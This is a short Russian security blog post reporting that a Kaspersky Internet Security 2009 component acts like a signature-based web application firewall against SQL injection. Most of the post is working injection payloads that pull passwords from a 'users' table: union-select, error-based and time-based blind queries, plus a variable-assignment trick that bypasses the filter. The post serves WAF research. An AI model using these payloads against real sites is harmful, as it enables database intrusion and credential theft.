ВАФ! Kaspersky тоже вроде WAF

ВАФ! Kaspersky тоже вроде WAF
Мои Позитивные коллеги тоже любят поиграться с sql injection:) Вот какое сообщение я наблюдал сегодня, когда виртуальная машина с лабораторной работойпо sql-инъекциям была запущена на компьютере, где установлен KIS 2009: Подобное сообщение можно увидеть, когда запрос содержит следующие ключевые слова и именно в такой последовательности: /?id=1 union select password from users name='more'> Примечательно, что такие запросы проходят без блокировки: /?id=1 union select passwd from users /?id=1 union select pass from users /?id=1 union select password from user /?id=1 union select login from users-- и т.п. Но, как быть, если необходимо использовать именно колонку с именем "password" и таблицу с именем "users"? Использовать все те же техники обхода, которые применяются и для других waf сигнатурного типа. Например, так: /?id=1+AND+extractvalue(1,concat(0x5C,(select+password+from+users+limit+0,1)))-- Или так: /?id=1+AND+if(ord((lower(mid((select+password+from+users+limit+0,1),1,1))))=49,sleep(10),1)-- Но в данном случае, фильтр KIS WAF обходится еще более изящнее. Сигнатура срабатывает только на строки "password" и "users", следующие после ключевого слова "union". Учитывая это, можно составить следующий запрос, который будет работать в обход фильтра KIS: /?id=1+and+(select+(@v:=password)+from+users+limit+0,1)+union+select+@v-- /?id=1+and+(select+(@v:=password)+from+users+limit+1,1)+union+select+@v-- и т.д. Собственно, KIS WAF bypass, но больше удивило другое - само присутствие waf в составе дистрибутива KIS ;))
waf research антивирусы SQL-Injection
Alt text
Обращаем внимание, что все материалы в этом блоге представляют личное мнение их авторов. Редакция SecurityLab.ru не несет ответственности за точность, полноту и достоверность опубликованных данных. Вся информация предоставлена «как есть» и может не соответствовать официальной позиции компании.
26.03
11:00
вебинар securitm
Как одной системой закрыть все ИБ-потребности?
Ответим на этот вопрос на вебинаре 26.03 в 11:00
Регистрируйтесь →
Реклама. 18+ ООО «Секъюритм» ИНН 7820074059

FREE
100%
Кибербезопасность · Обучение
УЧИСЬ!
ИЛИ
ВЗЛОМАЮТ
Лучшие ИБ-мероприятия
и вебинары — в одном месте
ПОДПИШИСЬ
T.ME/SECWEBINARS